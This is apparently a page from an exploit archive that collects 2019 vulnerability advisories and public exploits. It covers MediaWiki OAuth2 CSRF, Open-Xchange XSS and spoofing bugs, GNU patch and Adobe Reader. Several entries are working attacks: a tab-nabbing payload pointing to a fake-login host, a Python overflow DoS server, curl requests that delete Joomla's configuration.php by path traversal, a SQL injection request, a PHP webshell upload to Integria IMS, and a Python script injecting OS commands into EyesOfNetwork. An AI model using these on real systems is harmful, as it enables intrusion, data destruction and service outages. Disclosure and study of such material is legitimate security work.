MediaWiki OAuth2 Client version 0.3 suffers from a cross site request forgery vulnerability.

MD5 | 46e749ce553be96c1690bf02ed0d0f80

[CVE-2019-15150] CSRF in MediaWiki extension OAuth2 Client 0.3

Happy Sunday everyone.

A security bulletin for you all.

Software:
--------
MediaWiki OAuth2 Client (https://github.com/Schine/MW-OAuth2Client)

Description:
----------
MediaWiki implementation of the PHP League's OAuth2 Client, to allow MediaWiki
to act as a client to any OAuth2 server.

Not Affeted:
------------
0.2 and earlier.

Affected Versions:
---------------
0.3

Fixed Versions:
-------------
0.4

Problem:
--------

In the OAuth2 Client extension 0.3 for MediaWiki, a CSRF vulnerability
exists due to the OAuth2 state parameter not being checked in the callback
function.

Per OAuth 2.0 spec, the authorization code grant flow is susceptible to CSRF
and clickjacking attacks unless an appropriate "state" parameter is chosen and
verified.[1][2][3]

Although the software correctly generates an unguessable state value and sets
it in the URL to the OAuth 2.0 server, it fails to actually check/validate the
parameter in the callback against what it previously selected.

The regression was introduced when switching underlying vendor code.[4]

Impact:
-------

As described in the OAuth 2.0 RFC spec, this opens the site relying on the
software up to clickjacking and CSRF attacks.[1]

A successful attack can lead to loss of integrity of the user/victim.

Solution:
---------

Update callback function to verify presence and correct `state` value as
previously chosen prior to initiating the OAuth2 flow[5], as done in v0.4
release.[6]

Timeline:
---------

2019-08-17: Bug discovered
2019-08-17: CVE requested, assigned, privately disclosed to maintainer,
bugfix/patch authored
2019-08-18: Maintainer acknowledged, patched version 0.4 is released

Credit:
-------
Discovery by me.

Thanks to the maintainer Schine GmbH. for a quick acknowledgement and release.

References:
-----------

[1]: https://tools.ietf.org/html/rfc6749#section-10.12
[2]: https://auth0.com/docs/protocols/oauth2/mitigate-csrf-attacks
[3]: https://auth0.com/docs/protocols/oauth2/oauth-state
[4]: https://github.com/Schine/MW-OAuth2Client/commit/7188d6c8d359d41c6974c19b2c0907653bab8f6e
[5]: https://github.com/Schine/MW-OAuth2Client/commit/6a4fe4500ddd72ad4e826d9d63b2d69512bd10d1
[6]: https://github.com/Schine/MW-OAuth2Client/releases/tag/v0.4


--
Best Regards,
Justin Bull
PGP Fingerprint: E09D 38DE 8FB7 5745 2044 A0F4 1A2B DEAA 68FD B34C

Source

Open-Xchange OX App Suite suffers from a content spoofing, cross site scripting, and information disclosure vulnerabilities. Versions affected vary depending on the vulnerability.

MD5 | e4f984f70b4911993c1fb35b6018270a

Dear subscribers,

we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX App Suite
Vendor: OX Software GmbH

Internal reference: 64680 (Bug ID)
Vulnerability type: Content Spoofing (CWE-451)
Vulnerable version: 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-09
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11521
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)

Vulnerability Details:
Appointment titles are rendered as hyperlink but were missing a protection against "tab nabbing".

Risk:
When following a hyperlink to a malicious website, the original tab location (OX App Suite) could be replaced with a URL chosen by the attacker. This can be exploited to trick users to re-enter credentials to a seemingly legitimate website and as a result take over accounts.

Steps to reproduce:
1. Create a appointment invitation that contains a link to a malicious website including a blank "target" attribute
2. Make the user accept the invitation and click the hyperlink at the appointments title
3. Provide a effective exploit to overwrite the users original URL and fake a login page

Proof of concept:
Appointment title content:
Click Me! :-)

Payload:

window.opener.location.replace('//www.evil-fakelogin.com/');



Solution:
We extended the usage of existing protection mechanisms (blankshield) to this case.


---


Internal reference: 64682 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.0 and 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev31, 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-13
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11522
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
When replying to a HTML E-Mail with specific payload, that payload could be executed as script code. The user would have to have HTML composing enabled to exploit this vulnerability. This vulnerability could happen as browsers incorrectly "fix" HTML content as demonstrated by @kinugawamasato for Google Search.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).

Steps to reproduce:
1. Create an E-Mail with malicious content and deliver it to the user
2. Make the user "reply" to the E-Mail

Proof of concept:
Test

Another XSS!
<!-- --!
>


Solution:
We improved our filter and whitelisting mechanisms to block this kind of code from entering the browsers rendering engine.


---


Internal reference: 64703 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-13
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11522
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
When opening a embedded HTML E-Mail, sanitization mechanisms were not active.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).

Steps to reproduce:
1. Create an E-Mail with malicious content and embed/attach it to another E-Mail
2. Make the user open to embedded E-Mail using OX App Suites "View" feature

Proof of concept:



Solution:
We now use existing filtering mechanisms when processing embedded or attached E-Mail.


---


Affected product: OX App Suite
Internal reference: 62465 (Bug ID)
Vulnerability type: Information Exposure (CWE-200)
Vulnerable version: 7.6.3 and later
Vulnerable component: driverestricted, backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version (driverestricted): 7.6.3-rev4, 7.8.3-rev8, 7.8.4-rev6, 7.10.0-rev5, 7.10.1-rev4
Fixed version (backend): 7.6.3-rev46, 7.8.3-rev56, 7.8.4-rev52, 7.10.0-rev31, 7.10.1-rev12
Vendor notification: 2019-01-14
Solution date: 2019-05-13
Public disclosure: 2019-08-15
CVE reference: CVE-2019-11806
CVSS: 3.3 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
Bundles that contain private keys and passwords for OX Drive related push services were deployed without proper file-system permissions. We also fixed default file-system permissions for related configuration files that potentially contain passwords set by the operator.

Risk:
A user with non privileged system-level access could access and extract the bundles (JAR files) and analyze their byte-code. From that its possible to extract both the private key for APN certificates as well as their encryption password and GCM key/secret pairs. Extracting this does not open a specific attack vector but we consider the information confidential and our handling did not adhere to our standards with that kind of information.

Steps to reproduce:
1. Use a non privileged user account to access an OX App Suite Middleware machine
2. Check file permissions for "driverestricted" bundles that contain secret keys and passwords

Solution:
We updated file-system level permissions for such bundles and configuration files.

Source

Open-Xchange OX Guard versions 7.10.2 and below suffer from a cross site scripting vulnerability. Open-Xchange OX Guard versions 7.10.1 and below, 2.10.2 and below suffer from a signature validation vulnerability.

MD5 | 8a4509aba45a3f48bf32078dfdbc3fd1

Dear subscribers,

we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX Guard
Vendor: OX Software GmbH

Internal reference: 65132 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev48, 7.8.4-rev59, 7.10.0-rev32, 7.10.1-rev14, 7.10.2-rev5
Vendor notification: 2019-05-09
Solution date: 2019-06-13
Public disclosure: 2019-08-15
CVE reference: CVE-2018-9997
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
Curly brackets can be used to bypass XSS sanitization in HTML mail and other HTML attachments. A variation of the original issue has been found thats based on incorrect global eventhandler blacklist entries.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).

Steps to reproduce:
1. Create a HTML mail with curly brackets that disguise event handlers in CSS
2. Make a App Suite user open the malicious mail

Proof of concept:


Solution:
We updated the list of blacklisted event handlers to close this bypass, operators may add a workaround by updating "globaleventhandlers.list" and change the incorrect handler "onmounseleave" to "onmouseleave".


--


Internal reference: 64992 (Bug ID)
Vulnerability type: Data validation fault (CWE-34)
Vulnerable version: 7.10.1 and earlier, 2.10.2 and earlier
Vulnerable component: guard, backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version (guard): 2.8.0-rev22, 2.10.1-rev7
Fixed version (backend): 7.8.4-rev59, 7.10.1-rev14
Vendor notification: 2019-05-03
Solution date: 2019-06-13
Public disclosure: 2019-08-15
Researcher Credits: Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, and Jörg Schwenk
CVE reference: CVE-2019-11521
CVSS: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

Vulnerability Details:
Internal evaluation revealed that OX Guard is vulnerable to a subset of techniques used to display a valid signature from the identity of a trusted communication partner located in the mail header, although the crafted email is actually signed by an attacker. Our discoveries are based on work of a team of researchers, publishing these spoofing techniques under the "Johnny You Are Fired" project name.

Risk:
Recipients of signed PGP mail could be fooled to assume the mail originates from a trusted source rather than an attacker. This would elevate the mails trust level and potentially ease social-engineering attacks.

Steps to reproduce:
1. Create mails that contain valid signatures but originate from a different source

Proof of concept:
https://github.com/RUB-NDS/Johnny-You-Are-Fired/tree/master/04-id

Solution:
We improved validation and make sure mail with valid signatures is only evaluated to be "trusted" if the sender matches the signature issuer. We also extended our API to provide more information about a specific signature to let clients add checks and handle invalid signature information.

Source

GNU patch suffers from command injection and various other vulnerabilities when handling specially crafted patch files.

MD5 | 2736ae611fb76064752962e9ab5133a4

Source

GetGo Download Manager version 6.2.2.3300 suffers from a denial of service vulnerability.

MD5 | e23572f028f1de4e1321a3d92de0af8d

# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
# Date: 2019-08-15
# Author - Malav Vyas
# Vulnerable Software: GetGo Download Manager 6.2.2.3300
# Vendor Home Page: www.getgosoft.com
# Software Link: http://www.getgosoft.com/getgodm/
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
# Attack Type : Remote
# Impact : DoS
# Co-author - Velayuthm Selvaraj

# 1. Description
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and
# earlier could allow Remote NAS HTTP servers to perfor DOS via a long response.

# 2. Proof of Concept

import socket
from time import sleep
host = "192.168.0.112"
port = 80
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
sock.listen(1)
print "n[+] Listening on %d ..." % port

cl, addr = sock.accept()
print "[+] Connected to %s" % addr[0]
evilbuffer = "A" * 6000

buffer = "HTTP/1.1 200 " + evilbuffer + "rn"

print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OKn"

sleep(30)
cl.close()
sock.close()

Source

Joomla JS Jobs component version 1.2.6 suffers from an arbitrary file deletion vulnerability.

MD5 | 4aaff4d9cb1016b3b2f73bbdf2679d2f

# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
# Dork: inurl:"index.php?option=com_jsjobs"
# Date: 2019-08-16
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.joomsky.com/
# Software Link: https://www.joomsky.com/5/download/1
# Version: 1.2.6
# Tested on: Debian/nginx/joomla 3.9.0

# Vulnerability details:
# This vulnerability is caused when processing custom userfield.

File: site/models/job.php
Function: storeJob
Line: 1240
-------------------------------------

1215 //custom field code start
1216 $customflagforadd = false;
1217 $customflagfordelete = false;
1218 $custom_field_namesforadd = array();
1219 $custom_field_namesfordelete = array();
1220 $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);
1221 $params = array();
1222 $forfordelete = '';
1223
1224 foreach ($userfield AS $ufobj) {
1225 $vardata = '';
1226 if($ufobj->userfieldtype == 'file'){
1227 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){
1228 $vardata = $data[$ufobj->field.'_2'];
1229 }else{
1230 $vardata = $_FILES[$ufobj->field]['name'];
1231 }
1232 $customflagforadd=true;
1233 $custom_field_namesforadd[]=$ufobj->field;
1234 }else{
1235 $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : '';
1236 }
1237 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
1238 $customflagfordelete = true;
1239 $forfordelete = $ufobj->field;
1240 $custom_field_namesfordelete[]= $data[$ufobj->field.'_2']; //No check.
1241 }
...snip...
1323 // new
1324 //removing custom field
1325 if($customflagfordelete == true){
1326 foreach ($custom_field_namesfordelete as $key) {
1327 $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2); //!!!
1328 }
1329 }

File: site/models/common.php
Function: uploadOrDeleteFileCustom
Line: 851
-------------------------------------

748 $path = $base . '/' . $datadirectory;
749 if (!file_exists($path)) { // create user directory
750 $this->makeDir($path);
751 }
752 $isupload = false;
753 $path = $path . '/data';
754 if (!file_exists($path)) { // create user directory
755 $this->makeDir($path);
756 }
757 if($for == 3 )
758 $path = $path . '/jobseeker';
759 else
760 $path = $path . '/employer';
761
762 if (!file_exists($path)) { // create user directory
763 $this->makeDir($path);
764 }
...snip...
843 } else { // DELETE FILES
844 if ($isdeletefile == 1) {
845 if($for == 3){
846 $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';
847 }else{
848 $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/';
849 }
850 $file = $userpath.$field;
851 unlink($file); //!!!
852 }
853 return 1;
854 }
855 }

#####################################
#PoC:
#####################################

# If an administrator has added custom userfield 'ufield926' as field type 'file', attacker are can trigger this vulnerability by send a following requests.

$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926=@./valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"

$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"

Source

Web Wiz Forums version 12.01 suffers from a remote SQL injection vulnerability.

MD5 | 02a536280795c152ac1767403e0624fc

# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows

# Vulnerable parameter: PF (member_profile.asp)
# GET Request

GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1

Source

Integria IMS version 5.0.86 suffers from an arbitrary file upload vulnerability that allows for remote command execution.

MD5 | e5093a3f5921350e30fd4ec8f1a6f85e

# Exploit Title: Integria IMS 5.0.86 - Arbitrary File Upload
# Date: 2019-08-16
# Exploit Author: Greg.Priest
# Vendor Homepage: https://integriaims.com/
# Software Link: https://sourceforge.net/projects/integria/files/5.0.86/
# Version: Integria IMS 5.0.86
# Tested on: Windows
# CVE : N/A

# ---------------------------------------------------------------------------------------
# http://10.61.184.30/integria//index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
# ---------------------------------------------------------------------------------------

# [Description]
# filemgr.php in Integria IMS 5.0.86, allows arbitrary file upload.
# index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
# ---------------------------------------------------------------------------------------

POST /integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload HTTP/1.1
Host: 10.61.184.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.61.184.30/integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
Content-Type: multipart/form-data; boundary=---------------------------30333176734664
Content-Length: 374
Connection: close
Cookie: PHPSESSID=1d31d410e9b85f1e9aaa53a2616a550e
Upgrade-Insecure-Requests: 1

-----------------------------30333176734664
Content-Disposition: form-data; name="curdir"


-----------------------------30333176734664
Content-Disposition: form-data; name="file"; filename="whoami.php"
Content-Type: application/octet-stream

<?php
$output = shell_exec('whoami');
echo "
$output

";
?>

-----------------------------30333176734664--

Source

EyesOfNetwork version 5.1 authenticated remote command execution exploit.

MD5 | 2259218a24e60e9c5d94503f3acca3d0

# Exploit Title: EyesOfNetwork 5.1 - Authenticated Remote Command Execution
# Google Dork: N/A
# Date: 2019-08-14
# Exploit Author: Nassim Asrir
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: https://www.eyesofnetwork.com/?page_id=48&lang=fr
# Version: 5.1 < 5.0
# Tested on: Windows 10
# CVE : N/A

#About The Product:

''' EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application.
EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance.
EyesOfNetwork Supervision provides event management, availability, problems and capacity.
#Technical Analysis:
EyesOfNetwork allows Remote Command Execution via shell metacharacters in the module/tool_all/ host field.
By looking into tools/snmpwalk.php we will find the vulnerable part of code:
else{
$command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
}
in this line we can see as the attacker who control the value of "$host_name" variable .
And after that we have the magic function "popen" in the next part of code.
$handle = popen($command,'r');
echo "

";

while($read = fread($handle,100)){
echo nl2br($read);
flush();
}
pclose($handle);
And now we can see the use of "popen" function that execute the $command's value and if we set a shell metacharacters ";" in the end of the command we will be able to execute OS command.'''

#Exploit

import requests
import optparse
import sys
import bs4 as bs

commandList = optparse.OptionParser('usage: %prog -t https://target:443 -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()

if not options.target or not options.cmd or not options.user or not options.pwd:

commandList.print_help()
sys.exit(1)


url = options.target
cmd = options.cmd
user = options.user
pwd = options.pwd

with requests.session() as c:
link=url
initial=c.get(link)
login_data={"login":user,"mdp":pwd}
page_login=c.post(str(link)+"/login.php", data=login_data)
v_url=link+"/module/tool_all/select_tool.php"
v_data = {"page": "bylistbox", "host_list": "127.0.0.1;"+cmd, "tool_list": "tools/snmpwalk.php", "snmp_com": "mm", "snmp_version": "2c", "min_port": "1", "max_port": "1024", "username": '', "password": '', "snmp_auth_protocol": "MD5", "snmp_priv_passphrase": '', "snmp_priv_protocol": '', "snmp_context": ''}
page_v=c.post(v_url, data=v_data)
my=bs.BeautifulSoup(page_v.content, "lxml")
for textarea in my.find_all('p'):
final = textarea.get_text()
print final

Source

Adobe Acrobat Reader DC for Windows suffers from a double-free vulnerability due to a malformed JP2 stream.

MD5 | 160feb95df0fc9a1e82853c12dfe4902

Source